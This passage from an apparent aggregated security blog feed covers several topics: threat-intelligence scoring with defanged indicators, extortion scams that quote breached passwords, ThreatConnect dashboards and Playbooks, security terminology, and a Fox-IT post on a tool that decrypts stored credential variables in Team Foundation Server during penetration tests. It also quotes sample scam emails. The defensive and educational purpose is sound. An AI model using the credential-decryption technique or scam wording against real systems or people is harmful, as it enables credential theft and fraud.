When you're going through this analysis, every time you say to yourself "I don't know," that is an intelligence gap. The more you work through those intelligence gaps, the more you'll build a baseline for who to follow and why. An important aspect of this framework is that it requires a general understanding of your adversaries, or forces you to learn about them. It may be worthwhile to conduct a capability vs. intent assessment of adversaries prior to employing this framework to determine which adversaries are most pertinent to your organization.

Whenever you have a missing or very low score for either type of energy, that is a collection gap. Procuring or acquiring additional sources may help mitigate those deficiencies and result in better intelligence for your organization.

From the intelligence publisher/creator perspective, this framework can be applied to improve the utility of what they share. If they find that they can't identify the variables that go into these equations from their reports, there is some additional context there that they should investigate and share if possible. Additionally, if they were to provide calculated kinetic and potential energies for affected organizations along with their reports, then that might facilitate consumption and integration of their intelligence.

It's also important to note that for some reports that are one instance of specific activity, you only have to calculate the scores for a single indicator. That same score would then be accurate for all other indicators in that report or directly related to its relevant activity. For example, the IP addresses 5.135.237[.]219 and 176.107.177[.]7, which respectively host fifacups[.]org and atlanticouncil[.]org, would have the same potential energy scores as the domains.


While we went over our specific equations for kinetic and potential energy, this idea and the equations are extensible. The main requirement is capturing the velocity, vector, and degradation, but maybe you want to treat your assessment of that vector differently. Maybe you want to include other basic intelligence requirements, like the country targeted. If so, your equation might look like KE = U × ((S + O + D + A + L) / 5) × ((P − t) / P), where L is whether your location/country was targeted in the activity.

Or maybe you want to exclude unknown variables to mitigate shortcomings in reporting. Dividing by n, where n is the number of variables you're actually including, instead of 4 could do that: KE = U × ((sum of included variables) / n) × ((P − t) / P).

Or maybe you want to weight certain variables differently to reflect more important intelligence requirements. If activity targeting your organization is more important than the other variables, the equation might look like KE = U × ((S + 2O + D + A) / 5) × ((P − t) / P).

Regardless of which intelligence requirements you want to include, the vector factor of the equation is where you can easily change things up based on your own organization's specific intelligence needs. Additionally, you may want to consider altering the degradation aspect of the equation. For example, you may choose to deprecate the kinetic energy for files over a longer period (540 days) than that for hosts (360 days), simply by using a different deprecation period P for each indicator type.
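All of these variations can be folded into one generalized sketch (our own illustration, with hypothetical parameter names): arbitrary requirement flags, per-requirement weights, and a per-indicator-type deprecation period.

```python
def kinetic_energy(used, requirements, weights, days_since_seen, deprecation_days):
    """Generalized kinetic energy: velocity x weighted vector x degradation.

    `requirements` maps requirement names to binary hits (1 = the activity
    matches that requirement); `weights` maps the same names to relative
    importance. Unknown variables are simply left out of both mappings.
    """
    if not used:
        return 0.0
    vector = sum(requirements[name] * weights[name] for name in requirements)
    vector /= sum(weights.values())
    return vector * max(0.0, 1.0 - days_since_seen / deprecation_days)

# Equal weights reproduce the S+O+D+A behavior; doubling the organization
# weight reflects the "O matters more" variant; passing a 540-day period
# for files vs. 360 for hosts alters the degradation term.
score = kinetic_energy(
    used=1,
    requirements={"sector": 1, "org": 0, "data": 1, "adversary": 0, "location": 1},
    weights={"sector": 1, "org": 2, "data": 1, "adversary": 1, "location": 1},
    days_since_seen=0,
    deprecation_days=540,
)
print(score)  # (1 + 0 + 1 + 0 + 1) / 6 = 0.5
```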

Caveats and Conclusions

There are several caveats related to this idea and framework that we should also mention. First and foremost, this framework isn't going to be for everyone and its utility may hinge on your threat intelligence program's maturity. Some organizations may completely discount it as they already have a different process in place to evaluate indicators against their intelligence requirements. Others might not have the resources to run through this framework. Others also might just not think this framework is useful. We're hoping though that some organizations might find this useful either as a thought experiment, or to audit their intelligence program and identify intelligence and collection gaps, or maybe to even incorporate into their daily processes. Regardless of where you fall on that spectrum, we'd love to hear back from you on this idea and any thoughts you have on it.

Finally, it's worth noting that at this point, this is a manual process and more of an analytic technique or framework; however, we are investigating ways to employ this at scale and include it in our own intelligence reports. A lack of standards in industry reports and feeds could ultimately complicate automation efforts, so that is something else we are taking into account.

We've also created a data sheet summarizing this framework, complete with a worksheet to employ it against indicators.

The post Kinetic and Potential Energy Framework: Applying Thermodynamics to Threat Intelligence appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

Scammers Use Breached Personal Details to Persuade Victims

Scammers use a variety of social engineering tactics when persuading victims to follow the desired course of action. One example of this approach involves including in the fraudulent message personal details about the recipient to “prove” that the victim is in the miscreant’s grip. In reality, the sender probably obtained the data from one of the many breaches that provide swindlers with an almost unlimited supply of personal information.

Personalized Porn Extortion Scam

Consider the case of an extortion scam in which the sender claims to have evidence of the victim’s pornography-viewing habits. The scammer demands payment in exchange for suppressing the “compromising evidence.” A variation of this technique was documented by Stu Sjouwerman at KnowBe4 in 2017. In a modern twist, the scammer includes personal details about the recipient—beyond merely the person’s name—such as the password the victim used:

“****** is one of your password and now I will directly come to the point. You do not know anything about me but I know alot about you and you must be thinking why are you getting this e mail, correct?

I actually setup malware on porn video clips (adult porn) & guess what, you visited same adult website to experience fun (you get my drift). And when you got busy enjoying those videos, your web browser started out operating as a RDP (Remote Desktop Protocol) that has a backdoor which provided me with accessibility to your screen and your web camera controls.”

The email includes a demand for payment via cryptocurrency such as Bitcoin to ensure that "Your naughty secret remains your secret." The sender calls this "privacy fees." Variations on this scheme are documented in the Blackmail Email Scam thread on Reddit.

The inclusion of the password that the victim used at some point in the past lends credibility to the sender’s claim that the scammer knows a lot about the recipient. In reality, the miscreant likely obtained the password from one of many data dumps that include email addresses, passwords, and other personal information stolen from breached websites.

Data Breach Lawsuit Scam

In another scenario, the scammer uses the knowledge of the victim’s phone number to “prove” possession of sensitive data. The sender poses as an entity that’s preparing to sue the company that allegedly leaked the data:

“Your data is compromised. We are preparing a lawsuit against the company that allowed a big data leak. If you want to join and find out what data was lost, please contact us via this email. If all our clients win a case, we plan to get a large amount of compensation and all the data and photos that were stolen from the company. We have all information to win. For example, we write to your email and include part your number ****** from a large leak.”

The miscreant’s likely objective is to solicit additional personal information from the victim under the guise of preparing the lawsuit, possibly requesting the victim’s Social Security number, bank account details, etc. The sender might have obtained the victim’s name, email address, and phone number from a breached data dump, and is phishing for other, more lucrative data.

What to Do?

If you receive a message that solicits payment or confidential data under the guise of knowing some of your personal information, be skeptical. This is probably a mass-mailed scam and your best approach is usually to ignore the message. In addition, keep an eye on the breaches that might have compromised your data using the free and trusted service Have I Been Pwned by Troy Hunt, change your passwords when this site tells you they’ve been breached, and don’t reuse passwords across websites or apps.
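As an aside, Have I Been Pwned’s companion Pwned Passwords service lets you check a password itself without ever sending it anywhere: its k-anonymity "range" API takes only the first five characters of the password’s SHA-1 hash and returns a list of matching hash suffixes to compare locally. A minimal sketch (the helper functions are our own, and error handling is omitted):

```python
import hashlib

def hash_split(password):
    """SHA-1 the password; return the 5-char prefix to send and the suffix to keep."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    return digest[:5], digest[5:]

def pwned_count(suffix, range_response):
    """Scan a range-API response ("SUFFIX:COUNT" per line) for our suffix."""
    for line in range_response.splitlines():
        candidate, _, count = line.strip().partition(":")
        if candidate == suffix:
            return int(count)
    return 0  # suffix absent: password not found in the breach corpus
```

You would GET https://api.pwnedpasswords.com/range/&lt;prefix&gt; and pass the response body to pwned_count; the full hash, and the password, never leave your machine.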

Sometimes an extortion note is real and warrants a closer look and potentially law enforcement involvement. Only you know your situation and can decide on the best course of action. Fortunately, every example that I’ve had a chance to examine turned out to be a social engineering trick that recipients were best off ignoring.

To better understand the persuasion tactics employed by online scammers, take a look at my earlier articles on this topic:


Building Daily Habits to Stay Ahead of Security Fires

ThreatConnect's New OSINT Dashboard

It's a terrible cliché that so many security teams spend much of their time fighting fires. I'm not saying it's not a big problem, but I am saying that it's the responsibility of the security professional to make time for the routine, foundational activities that, over time, result in fewer and fewer fires. I'm not just talking about continuing education; I'm talking about the daily habits that help you both prevent fires and fight them better when they happen.

Building Habits

Even if it's just five minutes a day, what matters most is getting into the habit. Let me give you an example. At ThreatConnect, we've developed an "OSINT Dashboard." This dashboard is designed for a quick, five-minute perusal as soon as you log in to your ThreatConnect account, when you're sitting down to your daily cup of coffee (or whatever your poison is). It's not meant to take up a lot of time on deep dives, or to be a confounding mess of tactical indicators and irrelevant intelligence. It's meant as a basic leaping-off point to keep you on top of the struggles you might encounter later in the day/week/month/hopefully-never.

The dashboard is accessible to all users of our free Cloud environment (URL) by hovering over the "Dashboard" menu and selecting "OSINT Dashboard." Let's take a look at some of what you'll find on the dashboard.


OSINT Tied to Named CVEs

A lot of vulnerabilities that get reported never actually show up in the wild. The point of this datatable is to give you insight into what's actually showing up by surfacing the top CVEs tied to real intel. In a world of triage, these are the vulnerabilities you should consider paying attention to.


Latest Technical Blogs & Reports

In the old days, building five-minute habits meant wading through dozens of your favorite blogs (and likely going over the time limit). No more! The "Technical Blogs & Reports" source in ThreatConnect is a curated, machine- and human-readable collection of more than a hundred blogs and reports from leading security companies, intel providers, academia, and armchair enthusiasts. Rather than making you check through everything, this dashboard card compiles all of that information into the latest and greatest.


Latest Intel

Sometimes five-minute habits lead to deeper dives, and that's okay. If something piques your interest, you should have the option of learning more. This card shows how many pieces of intel have come in over the past week, and by clicking on any item you can find out more. Want the latest Adversary intel? Click Adversary. Want to learn about the latest Campaigns? Click Campaign!

A Starting Point

This is just a sampling of the information available on the dashboard. Since it's free, I'd encourage you to check it out for yourself and consider incorporating it into your daily routine.

Ultimately, the habits you build need to make sense to you. They need to be relevant. Our TC Manage™, TC Analyze™, and TC Complete™ customers can actually create their own habit-forming dashboards. For example, if your "morning cup of coffee" routine includes reading about the latest threats from China, you can create a dashboard with that in mind. If your daily routine involves your favorite malware family, you can do that, too.

The post Building Daily Habits to Stay Ahead of Security Fires appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

Cyber is Cyber is Cyber

If you’re in the business of safeguarding data and the systems that process it, what do you call your profession? Are you in cybersecurity? Information security? Computer security, perhaps? The words we use, and the way in which the meaning we assign to them evolves, reflects the reality behind our language. If we examine the factors that influence our desire to use one security title over the other, we’ll better understand the nature of the industry and its driving forces.

Until recently, I’ve had no doubts about describing my calling as an information security professional. Yet the term cybersecurity is growing in popularity. This might be because the industry continues to embrace the lexicon used in government and military circles, where cyber reigns supreme. It may also be due to the familiarity with the word cyber among non-experts.

When I asked on Twitter about people’s opinions on these terms, I received several responses, including the following:

  • Danny Akacki was surprised to discover, after some research, that the origin of cyber goes deeper than the marketing buzzword that many industry professionals believe it to be.
  • Paul Melson and Loren Dealy Mahler viewed cybersecurity as a subset of information security. Loren suggested that cyber focuses on technology, while Paul considered cyber as a set of practices related to interfacing with adversaries.
  • Maggie O’Reilly mentioned Gartner’s model that, in contrast, used cybersecurity as the overarching discipline that encompasses information security and other components.
  • Rik Ferguson also advocated for cybersecurity over information security, viewing cyber as a term that encompasses multiple components: people, systems, as well as information.
  • Jessica Barker explained that “people outside of our industry relate more to cyber,” proposing that if we want them to engage with us, “we would benefit from embracing the term.”

In line with Danny’s initial negative reaction to the word cyber, I’ve perceived cybersecurity as a term associated with heavy-handed marketing practices. Also, like Paul, Loren, Maggie and Rik, I have a sense that cybersecurity and information security are interrelated and somehow overlap. Jessica’s point regarding laypersons relating to cyber piqued my interest and, ultimately, changed my opinion of this term.

There is a way to dig into cybersecurity and information security to define them as distinct terms. For instance, NIST defines cybersecurity as:

“Prevention of damage to, protection of, and restoration of computers, electronic communications systems, electronic communications services, wire communication, and electronic communication, including information contained therein, to ensure its availability, integrity, authentication, confidentiality, and nonrepudiation.”

Compare that description to NIST’s definition of information security:

“The protection of information and information systems from unauthorized access, use, disclosure, disruption, modification, or destruction in order to provide confidentiality, integrity, and availability.”

From NIST’s perspective, cybersecurity is about safeguarding electronic communications, while information security is about protecting information in all forms. This implies that, at least according to NIST, cybersecurity is a subset of information security. While this nuance might be important in some contexts, such as regulations, the distinction probably won’t remain relevant for long, because of the points Jessica Barker raised.

Jessica’s insightful post on the topic highlights the need for security professionals to use language that our non-specialist stakeholders and people at large understand. She outlines a brief history that lends credence to the word cyber. She also explains that while most practitioners seem to prefer information security, this term is least understood by the public, where cybersecurity is much more popular. She explains that:

“The media have embraced cyber. The board has embraced cyber. The public have embraced cyber. Far from being meaningless, it resonates far more effectively than ‘information’ or ‘data’. So, for me, the use of cyber comes down to one question: what is our goal? If our goal is to engage with and educate as broad a range of people as possible, using ‘cyber’ will help us do that. A bridge has been built, and I suggest we use it.”

Technology and the role it plays in our lives continues to change. Our language evolves with it. I’m convinced that the distinction between cybersecurity and information security will soon become purely academic and ultimately irrelevant even among industry insiders. If the world has embraced cyber, security professionals will end up doing so as well. While I’m unlikely to wean myself off information security right away, I’m starting to gradually transition toward cybersecurity.

Communicating About Cybersecurity in Plain English

When cybersecurity professionals communicate with regular, non-technical people about IT and security, they often use language that virtually guarantees that the message will be ignored or misunderstood. This is often a problem for information security and privacy policies, which are written by subject-matter experts for people who lack the expertise. If you’re creating security documents, take extra care to avoid jargon, wordiness and other issues that plague technical texts.

To strengthen your ability to communicate geeky concepts in plain English, consider the following exercise: Take a boring paragraph from a security assessment report or an information security policy and translate it into a sentence that’s no longer than 15 words without using industry terminology. I’m not suggesting that the resulting statement should replace the original text; instead, I suspect this exercise will train you to write more plainly and succinctly.

For example, I extracted and slightly modified a few paragraphs from the Princeton University Information Security Policy, just so that I could experiment with some public document written in legalese. I then attempted to relay the idea behind each paragraph in the form of a 3-line haiku (5-7-5 syllables per line):

This Policy applies to all Company employees, contractors and other entities acting on behalf of Company. This policy also applies to other individuals and entities granted use of Company information, including, but not limited to, contractors, temporary employees, and volunteers.

If you can read this,
you must follow the rules that
are explained below.

When disclosing Confidential information, the proposed recipient must agree (i) to take appropriate measures to safeguard the confidentiality of the information; (ii) not to disclose the information to any other party for any purpose absent the Company’s prior written consent.

Don’t share without a
contract any information
that’s confidential.

All entities granted use of Company Information are expected to: (i) understand the information classification levels defined in the Information Security Policy; (ii) access information only as needed to meet legitimate business needs.

Know your duties for
safeguarding company info.
Use it properly.

By challenging yourself to shorten a complex concept into a single sentence, you motivate yourself to determine the most important aspect of the text, so you can better communicate it to others. This approach might be especially useful for fine-tuning executive summaries, which often warrant careful attention and wordsmithing. This is just one of the ways in which you can improve your writing skills with deliberate practice.

Playbook Fridays: Conducting VMRay Malware Analysis

Save time with a one-click process

ThreatConnect developed the Playbooks capability to help analysts automate time consuming and repetitive tasks so they can focus on what is most important, and, in many cases, to ensure the analysis process occurs consistently and in real time, without human intervention.

An automated malware analysis (AMA) system is a requirement in any defender's repertoire. Any time an analyst saves on what amounts to menial labor can be spent on actual analysis and on proactively defending the organization.

This Playbook takes a suspicious or malicious file sample from ThreatConnect's Malware Vault and transmits it to an automated malware analysis system, in this case, VMRay, submitting it for dynamic and static analysis. It turns a manual, multiple-click process into a simple, one-click process, saving a small amount of time, which really adds up over the course of weeks and months.

The Playbook is triggered by a User Action. In this case, the run playbook button is mapped to Documents in ThreatConnect. This generates a button on the Document's details page called "VMRay Analyze".

The Playbook downloads the malware sample and copies the archive password stored in an attribute of the Document. Both, along with any configuration settings, are submitted to VMRay's REST API. The Playbook then checks whether the sample is marked with either of two restrictive TLP designations, TLP:RED or TLP:AMBER; if so, the sample is analyzed only by VMRay and is not additionally checked with third-party scanners. Finally, the Playbook checks for errors and returns a tooltip with a link to the analysis report in VMRay's portal.



Entire VMRay Submission Playbook




New Playbook Return on Investment Calculator



In the latest release of ThreatConnect, Playbooks now have a Return on Investment (ROI) calculator. By comparing the time saved by running a playbook with the time an analyst would spend performing the process manually, one can calculate roughly how much money a playbook is saving a team over time.
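The idea behind such a calculator can be illustrated with a few lines of arithmetic. The formula and the numbers below are assumptions for illustration, not ThreatConnect's exact calculation:

```python
def playbook_roi(runs, manual_minutes, automated_minutes, hourly_rate):
    """Rough dollar value of analyst time saved by automating a process:
    (runs x minutes saved per run), priced at an hourly analyst rate.
    A sketch of the concept, not ThreatConnect's exact formula."""
    minutes_saved = runs * (manual_minutes - automated_minutes)
    return minutes_saved / 60 * hourly_rate

# 500 runs a month, 6 minutes by hand vs. 30 seconds automated,
# at a hypothetical $75/hour analyst rate: roughly $3,437 saved per month.
print(round(playbook_roi(500, 6.0, 0.5, 75), 2))
```

Even a "small amount of time" per run, as noted above, compounds quickly at SOC volumes.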


The following are a few highlights from certain steps in the Playbook:



A Set Variable app is the first step in the Playbook. This allows the user to set various options used during submission to VMRay.


This step uses an implementation of JMESPath to check if the sample in the ThreatConnect Malware Vault has been marked with a security label. In this case, it is checking for TLP:AMBER and TLP:RED, two designations that are part of the traffic light protocol, a system for governing how data may be shared and with whom. In this case, data that is marked with either of these two restrictive TLPs will be sent only to VMRay and not to any third party system.
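The routing decision this step makes can be sketched in plain Python. The JMESPath expression and field names below are illustrative, not the exact ThreatConnect API response:

```python
# Conceptually, the Playbook step evaluates a JMESPath expression such as:
#   securityLabel[?name=='TLP:RED' || name=='TLP:AMBER'] | [0]
# Below is a pure-Python sketch of the same routing decision.

RESTRICTIVE_TLPS = {"TLP:RED", "TLP:AMBER"}

def allow_third_party_scanners(document):
    """Return False when the sample carries a restrictive TLP label."""
    labels = {label.get("name") for label in document.get("securityLabel", [])}
    return not (labels & RESTRICTIVE_TLPS)

# A TLP:AMBER sample goes to VMRay only:
print(allow_third_party_scanners({"securityLabel": [{"name": "TLP:AMBER"}]}))  # False
```

An unlabeled sample, or one carrying only TLP:GREEN or TLP:WHITE, would pass the check and could be sent to third-party scanners as well.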


This step leverages ThreatConnect's data store to save the API response from VMRay. As you can see, this uses the "Organization" domain of the data store. This allows other playbooks running in one's org in ThreatConnect access to the data that this playbook writes there. Any further operations can then be built out in other playbooks based on the saved data.


The trigger for this playbook is a User Action. This provides a button on the malware vault document that runs the playbook in the context of that Document. After the sample has been submitted for analysis to VMRay, a link back to the report in VMRay's portal is displayed to the user as a tooltip that appears above the button once it has been clicked. If for some reason the analysis failed at the time of submission, the error message is displayed in the same tooltip for the user to view.

The post Playbook Fridays: Conducting VMRay Malware Analysis appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

Playbook Fridays: How to Use ThreatConnect Playbooks to Manage Security APIs

Planning for APIs as part of your security architecture

This is my first Playbook Friday blog post. I love the ones that the team creates and thought I would try my hand at one. That said, because I am not in the Platform as much as I'd like to be, I enlisted the help of one of our Sales Engineers. (Thanks for your help, Ryan!)

In my last blog post, I spoke to the challenge of APIs not existing when we were getting started and how we had to wait out the market. APIs are now available across the security industry, which is very good news. The problem now is that the number of APIs used by security professionals, and the overhead of managing them, is creating a new challenge within the security team.

Many organizations have multiple tools and analysts using the same product's APIs. In some cases each user or connected tool has its own API account under a unique subscription; in others they share an enterprise subscription. Either way, every person and every connected tool may make use of the same API. For example, the SIEM enriches some data with a connection to a malware intelligence service (e.g., Hybrid Analysis, ReversingLabs, or VirusTotal), then sends an alert to the IR platform, which does the same lookups in the malware service, which then calls out to a threat intel analytics and orchestration platform and asks the exact same question. So, in the best case, you had three calls to the malware service from three tools per interesting event in the SIEM. This is inefficient, wastes time, and introduces more potential points of failure.

Now remember, this one use case is not the only one leveraging the API. Generally there will be people running custom scripts, other tools beyond the ones above, or people who have been given the API keys without your knowledge, all employing the API. In other words, a single API may be used hundreds or thousands of times a day, depending on the use cases and the number of people and tools that have the key.

API Management

This is why API management became important in IT years ago with the success of Service-Oriented Architecture (SOA). For those of you who have never heard of SOA or want to learn more, please take a look at the resources from Arcitura Education, which provide a great deal of information on the topic.

In order to counter the problem stated above and leverage the principles of SOA and API management, the security organization needs to plan for APIs as part of its architecture. Following SOA principles, the service should be built to answer a specific question, say "Tell me what I know about a file," and be managed as a resource that is independent of the underlying technologies and services behind it.

Benefits of API Management within the security organization:

  • Reduce the risk of failure by reducing complexity across your API-dependent systems
  • Save resources otherwise spent building or configuring each API connection independently in separate tools and processes
  • Conserve metered API calls to services through caching, along with bandwidth and external network traffic across external service calls
  • Decouple internal users and systems from shared API key usage, and uncover services bought multiple times unknowingly so the expense of duplicate subscriptions can be alleviated
  • Perform analytics across APIs to measure their effectiveness and provide insights into interesting use cases across your enterprise


Now let's get a little more detailed about how we are going to fulfill the needs of the service. I'm going to assume that the customer is using ThreatConnect and has the Playbooks capability, which allows them to create ThreatConnect Playbooks and Playbook Components. Although I am using ThreatConnect for all aspects of this use case, there may be reasons to invest in a dedicated API management technology. Products like CA Technologies (formerly Layer 7 Technologies) and Apigee are well known in this area. Also, most of the large cloud providers (Amazon, Microsoft, IBM, and Oracle) have some type of API management capability as part of their offerings.

As an example, we will build an enterprise Malware Analysis Service, integrating the API with the underlying knowledge in ThreatConnect and in CAL™ as well as a third party's malware service. Then we will add metrics collection across various aspects of the service, add a caching capability, and finally configure a dashboard that highlights various aspects of the service's usage.

Step 1. Create the "Malware Analysis Service" using a Playbook that receives an API query with HTTP Basic Authentication and a File Indicator as input. The HTTP Basic Authentication ties requests to specific people and tools across the organization.
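A caller of such a service might construct its request as sketched below. The endpoint, credentials, and body fields are hypothetical; only the Basic Authentication scheme itself (RFC 7617) is standard:

```python
import base64

def basic_auth_header(username, password):
    """Build an HTTP Basic Authentication header so each request can be
    tied back to a specific person or tool in the organization."""
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    return {"Authorization": f"Basic {token}"}

# A hypothetical submission to the Malware Analysis Service Playbook:
#   POST https://tc.example.org/api/playbooks/malware-analysis
#   headers: basic_auth_header("siem-svc", "s3cret")
#   body:    {"fileIndicator": "44d88612fea8a8f36de82e1278abb02f"}
headers = basic_auth_header("siem-svc", "s3cret")
print(headers["Authorization"].startswith("Basic "))  # True
```

Because each caller authenticates with its own identity, the per-user execution metrics described later fall out of the request logs for free.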


Basic Flow:

Step 2. Create a Playbook Component for "Retrieve File Intel" which collects knowledge across the ThreatConnect Platform as well as calls another Playbook Component that queries external services. The combined set of data is returned as JSON to the Malware Analysis Service Playbook.   



Basic Flow:

  • Receive username and file indicator as input
  • Increment File Observation
  • Run File Analysis Playbook Component
  • Get all Intel from within ThreatConnect and CAL about file indicator
  • Merge File Analysis response and all other intel collected and return JSON result to Malware Analysis Service Playbook


  • Daily Executions - Total and By User
  • Daily Executions - File Found
  • Daily Executions - File Not Found


Step 3. Create a Playbook Component for "Retrieve File Report" which collects knowledge from one or more external services and returns to the Malware Analysis Service Playbook. Of particular interest is that this Playbook calls a caching component that returns the previous result if the cache is less than 30 days old.



Basic Flow:

  • Receive username and file indicator as input
  • Determine if file indicator is in cache (<30 days)
  • If no cache hit then send query to file analysis and enrichment service and update ThreatConnect database and cache
  • Return JSON response


  • Daily Executions - Total
  • Daily Executions - Cached
  • Daily Executions - File Not Found
  • Daily Executions - File Found


Step 4. Create Playbook Components for "Set Data Cache" and "Read Data Cache". Both Components are built on the ThreatConnect DataStore capability, which supports CRUD (Create, Read, Update, Delete) operations.



Basic Flow:

  • Receive file indicator as input
  • If the indicator exists in the cache, get the data and timestamp out of the DataStore; otherwise return null.
  • Call the Get Delta Epoch Component with the cache max age as the delta. This returns the maximum allowed age as an epoch timestamp.
  • If the Get Delta Epoch result is less than the cache timestamp, the data is still valid; otherwise the data is stale and null is returned.
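The freshness test in the flow above can be sketched as follows. The constant and helper names are illustrative; in the Playbook this logic lives in the Get Delta Epoch Component:

```python
import time

CACHE_MAX_AGE_DAYS = 30  # the 30-day window used by the caching Component

def cache_entry_is_fresh(entry_epoch, now=None):
    """Mirror the 'Get Delta Epoch' check: compute now minus the maximum
    cache age, and treat the entry as valid while its timestamp is newer."""
    if now is None:
        now = time.time()
    oldest_allowed = now - CACHE_MAX_AGE_DAYS * 86400
    return entry_epoch >= oldest_allowed

# An entry written 29 days ago is still served from cache;
# one written 31 days ago falls through to the external service.
```

Storing plain epoch timestamps alongside the cached data keeps the comparison to a single subtraction, which is why the Component returns the maximum age "as an epoch."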


Basic Flow:

  • Receive a JSON object of the file indicator as input
  • Check whether the data already exists in the cache
  • If it exists, delete it, then set it with the received data and current epoch timestamp
  • If it doesn't exist, set it with the received data and current epoch timestamp

Step 5. Now that the capabilities of the service are dealt with, and API calls are being received from users, we can move on to creating a dashboard to better monitor the service's usage.



Above is a screen capture of a dashboard that allows us to quickly see how the Malware Analysis Service is being leveraged (top left) and how the external enrichment services are being utilized as part of the service (top right). On the bottom left you can see who is using the Malware Analysis Service and who the heavy users are. On the bottom right is a list of the most highly observed file indicators.

Looking at the top right dashboard card, and the red line specifically, you can see how effective your cache is relative to the service's overall queries. As I said in the beginning, external services are often rate limited, or charged per query, so it is a good idea to measure cache effectiveness and see how you can tweak it for better performance. This, coupled with an understanding of the per-query cost savings, can be presented as one component of the service's value-add.

On June 5th at 10:30am, Ron Richie and Pat Opet from J.P. Morgan Chase & Co., and I are presenting at the Gartner Security and Risk Summit in the Potomac B, Ballroom Level. Our presentation is titled "Architecting For Speed: Building a Modern Cyber-Service-Oriented Architecture" and will describe a modern service-enabled stack, positioned for critical security decisions at speed.

If you like what you see here, check out the Playbooks and components repository here in GitHub.


Introducing Team Foundation Server decryption tool

During penetration tests we sometimes encounter servers running software that use sensitive information as part of the underlying process, such as Microsoft’s Team Foundation Server (TFS). TFS can be used for developing code, version control and automatic deployment to target systems. This blogpost provides two tools to decrypt sensitive information that is stored in the TFS database.

Decrypting TFS secrets

Within Team Foundation Server (TFS), it is possible to automate the build, testing and deployment of new releases. With the use of variables it is possible to create a generic deployment process once and customize it per environment. Sometimes specific tasks need a set of credentials or other sensitive information, and therefore TFS supports encrypted variables. With an encrypted variable, the contents of the variable are encrypted in the database and not visible to the user of TFS.


However, with sufficient access rights to the database it is possible to decrypt the encrypted content. Sebastian Solnica wrote a blogpost describing this technique.

Fox-IT wrote a PowerShell script that uses the information mentioned in the blogpost. While the blogpost mainly focused on the decryption technique, the PowerShell script is built with usability in mind. The script will query all needed values and display the decrypted values. An example can be seen in the following screenshot:


The script can be downloaded from Fox-IT’s Github repository:

It is also possible to use the script in Metasploit. Fox-IT wrote a post module that can be used through a meterpreter session. The result of the script can be seen in the screenshot below.


There is a pull request pending and hopefully the module will be part of the Metasploit Framework soon. The pull request can be found here:



ThreatConnect and the Rise of the Security Developer

Taking Your Team & Career to the Next Level with ThreatConnect's GitHub Repositories

When I walk the show floors at RSA or Black Hat, I'm always struck by the number of new products that pop up every year. The "hot topic" varies - this year it was AI - but new booths springing up from the expo center carpet like magic is a constant. It can be a bit overwhelming: like showing up at a bar with an outrageously huge beer selection. But it can also be exciting, like (responsibly) trying all of those beers.


Yep, this is what Black Hat is like. In so, so many ways.


We get it. There's finally a hot new EDR or UEBA tool that does everything that you want, but you're nervous: will it work in your environment? Can your existing tools talk to it? Will your team understand how to use it? At ThreatConnect, our vision is to ensure that your answer is consistently "yes": if you're excited about new software, you should be able to integrate it into your team, your processes, and your tech stack. We've written at length about our platform strategy, but that "yes" is what it really comes down to.

The Rise of the Security Developer

One trend that makes this strategy possible is the rise of the Security Developer - security analysts who are dangerous enough with Python to take advantage of all of these new tools. If you're able to get that new EDR or UEBA or AMA or vulnerability scanner to work with your existing SIEM, ticketing system, whatever... you'll be a hero. Honing your skills with Python (or another security-friendly scripting language) and becoming familiar with APIs are big parts of becoming a Security Developer. To really take advantage of those skills, though, you need a "partner in crime": an extensible security platform that can bring all those APIs and exciting tools into a central location where all of your data and teammates can take advantage. Like ThreatConnect.

To enable new and mature Security Developers, we've created robust SDKs that can help you write apps, build automations, and more. A great place to get started is in our documentation.



Dogs are the best.

No One is an Island

Our Security Developer customers make extensive use of these tools in their own ThreatConnect environments: integrating systems, automating common tasks, and flexing their developer muscles. But part of growing as a Security Developer is collaborating with other Security Developers.

We provide an exclusive Slack workspace¹ for our customers to exchange best practices about threat intelligence, security, and ThreatConnect. One day, something exciting happened: customers started sharing ThreatConnect software they'd built on Slack. This was amazing! Security Developers were collaborating!

Of course, while we love Slack, it's not the best tool for sharing software.


¹ If you're a current customer and are interested in joining our Slack community, please contact your customer success manager.

Announcing: ThreatConnect GitHub Repositories

To more effectively enable our Security Developer users, we're excited to announce the launch of four GitHub repositories (repos) that they can use to share and collaborate. Our hope is that these repos not only help our users share successes and get more value out of ThreatConnect, but also help them hone their skills and make themselves and their teams more effective defenders.



This is more like it.


Let's go over the four repositories:

Spaces Repository

Available here:

"Spaces" are applications that run in the ThreatConnect UI. Using Spaces, you can extend the abilities of ThreatConnect in a way that benefits other analysts. Enrich indicators in VirusTotal or DomainTools, visualize relationships between intelligence, do some quick static analysis: these are all tools that users have built using Spaces that run smartly in ThreatConnect.

Jobs Repository

Available here:

"Jobs" are apps that run in the background: collecting data from external feeds, enriching indicators in bulk, deploying indicators to a SIEM based on rules, etc.

Tools Repository

Available here:

Unlike the other repos, this one is intended for software that doesn't run in ThreatConnect but instead enables developers in other ways: a tool to make it easier to develop other ThreatConnect apps, a Chrome extension, etc.

Playbooks Repository

Available here:

Playbooks are custom, intelligence-driven automated or partially automated processes that users can build in ThreatConnect. The Playbooks Repository allows users to collaborate on a variety of Playbooks resources: one of these is obviously Playbooks themselves, but the two most important are Components and Apps.

Integrations between security products today are more and more commonplace, but they are largely point solutions. It's nearly impossible for them on their own to incorporate logic based on what your team is doing or what all other products across your security technology stack are seeing. Furthermore, these integrations often lack some desired functionality that is unique to your needs. That's part of why your role as a Security Developer is so valuable: you can tune integrations to your needs and automate the processes that make them and your teams work together. What makes your job easier isn't a silver bullet, it's having the right building blocks. Components and Playbook Apps are those building blocks.

Playbook Components

Components allow users to combine any Playbook Apps: HTTP Client for REST API calls, the Email and Slack apps for notification, JSON Path for JSON queries, and the Regex app for data extraction, to name a few. These apps give users quite a bit of power and can be turned into reusable Components for any Playbook (much like writing a Python function). For example, we've been able to build enrichment Components that call an API with authorization, extract data using JSON Path, and expose the results as variables for other apps in a Playbook. Components can be reused in multiple Playbooks and look just like apps. It's a good way to create basic integrations with Playbooks that can then be integrated into other processes.

Playbook Apps

For when you need to build or modify an app, we provide an SDK and app framework so you can build any Playbook App in Python or Java. While you need to be comfortable in Python (or Java), this gives you full control over the functionality. Your apps behave just like any other app in Playbooks, with inputs and outputs.

Ready to Start or Learn More?

